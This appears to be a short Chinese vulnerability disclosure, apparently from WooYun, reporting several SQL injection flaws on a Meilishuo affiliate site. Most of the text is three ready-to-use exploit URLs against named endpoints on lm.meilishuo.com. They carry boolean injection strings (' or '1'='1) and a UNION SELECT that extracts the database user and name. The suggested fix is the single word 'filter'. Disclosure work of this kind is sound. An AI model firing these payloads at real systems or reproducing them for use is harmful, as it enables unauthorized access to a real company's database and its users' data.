美丽说某站多处SQL注入漏洞

美丽说某站多处SQL注入

https://lm.meilishuo.com/union/sppromotion/?sort=0&type=1&content=尚雅衣橱' or '1'='1https://lm.meilishuo.com/union/stpromotion/?sort=0&catalog=2' and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,11,12%23https://lm.meilishuo.com/union/pro_manage/?sort=0&catalog=11801&type=1&content=' or '1'='1WooYun: 美丽说某站多处SQL注入打包(盲注+union)
解决方案：
过滤